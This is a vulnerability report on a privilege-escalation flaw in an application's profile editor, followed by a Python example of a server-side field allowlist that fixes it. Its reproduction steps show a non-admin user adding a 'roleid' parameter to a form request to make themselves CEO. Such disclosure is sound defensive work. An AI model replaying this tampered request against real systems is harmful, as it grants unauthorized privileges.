Insufficient permission checking on the "roleid" parameter during profile editing
A user without administrative privileges can modify his own "roleid" parameter, which holds the user's application role (CEO, Vice President, Sales Manager, etc.). This is due to insufficient permission checking during profile modification.
How to reproduce:
To better illustrate this vulnerability, I created a "guest" role with the lowest permissions possible (basically no permissions).
If an administrator edits the "noob" user profile, we see that the parameter "roleid" containing "H7" ("H7" for guest, "H2" for CEO, "H3" for Vice President and so on) is sent in the request and is used to specify the user's role.
-----------------------------5872578910825
Content-Disposition: form-data; name="last_name"
noob
-----------------------------5872578910825
Content-Disposition: form-data; name="is_admin"
0
-----------------------------5872578910825
Content-Disposition: form-data; name="roleid"
H7
-----------------------------5872578910825
Content-Disposition: form-data; name="lead_view"
Today
-----------------------------5872578910825
When the "noob" user edits his profile, the parameter "roleid" is absent from the request.
Content-Disposition: form-data; name="last_name"
noob
-----------------------------7135213064867
Content-Disposition: form-data; name="lead_view"
Today
-----------------------------7135213064867
However, if the user adds it himself, the application accepts the parameter and modifies the user's role, even though he doesn't have the required permissions to do so.
Content-Disposition: form-data; name="last_name"
noob
-----------------------------7135213064867
Content-Disposition: form-data; name="roleid"
H2
-----------------------------7135213064867
Content-Disposition: form-data; name="lead_view"
Today
-----------------------------7135213064867
The "is_admin" parameter is also present when the administrator edits the profile; however, permissions seem to be enforced on this one, and a non-admin user can't modify it.
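As an added example (not code from the original report or from the affected product), the following Python shows how a server-side profile-update handler should decide which fields to accept: the allowlist is derived from the caller's privilege, not from which fields the client sent, so a smuggled "roleid" from a non-admin is rejected while the same body from an administrator is applied. It treats both "roleid" and "is_admin" as admin-only, generalizing the fix beyond the single parameter reported; the user records, the "first_name" field and the role/permission checks are assumptions, and the request body is constructed to mirror the tampered capture above.

```python
import email

# Fields a user may change on their own profile; anything else is rejected.
SELF_EDITABLE = {"first_name", "last_name", "lead_view"}
# Fields that alter authorization state; only an administrator may set them
# (the report shows "is_admin" already enforced, "roleid" not).
ADMIN_ONLY = {"roleid", "is_admin"}

def parse_form(boundary: str, body: bytes) -> dict:
    """Parse a multipart/form-data body into {field name: value}."""
    # Prepend the header the parser needs; the body itself is used verbatim.
    raw = (b'Content-Type: multipart/form-data; boundary="' + boundary.encode()
           + b'"\r\n\r\n' + body)
    msg = email.message_from_bytes(raw)
    fields = {}
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        name = part.get_param("name", header="content-disposition")
        if name:
            fields[name] = part.get_payload(decode=True).decode().strip()
    return fields

def update_profile(actor: dict, target: dict, form: dict) -> tuple:
    """Apply actor's edit to target; return (updated record, rejected fields)."""
    # The allowlist depends on the caller's privilege, never on which
    # fields the client chose to send (that is what made "roleid" exploitable).
    allowed = set(SELF_EDITABLE)
    if actor.get("is_admin"):
        allowed |= ADMIN_ONLY
    rejected = sorted(k for k in form if k not in allowed)
    updated = dict(target)
    updated.update({k: v for k, v in form.items() if k in allowed})
    return updated, rejected

def build_body(boundary: str, fields: dict) -> bytes:
    """Build a multipart/form-data body (constructed demo input)."""
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{n}"'
             f"\r\n\r\n{v}\r\n" for n, v in fields.items()]
    return ("".join(parts) + f"--{boundary}--\r\n").encode()

# Constructed records (hypothetical) and a request mirroring the tampered capture.
NOOB = {"user_name": "noob", "is_admin": 0, "roleid": "H7"}
ADMIN = {"user_name": "admin", "is_admin": 1, "roleid": "H2"}
BOUNDARY = "-" * 27 + "7135213064867"
TAMPERED = build_body(BOUNDARY,
                      {"last_name": "noob", "roleid": "H2", "lead_view": "Today"})

if __name__ == "__main__":
    print(update_profile(NOOB, NOOB, parse_form(BOUNDARY, TAMPERED)))
```

A non-empty `rejected` list from a non-admin caller is worth logging as a tampering signal rather than silently discarding.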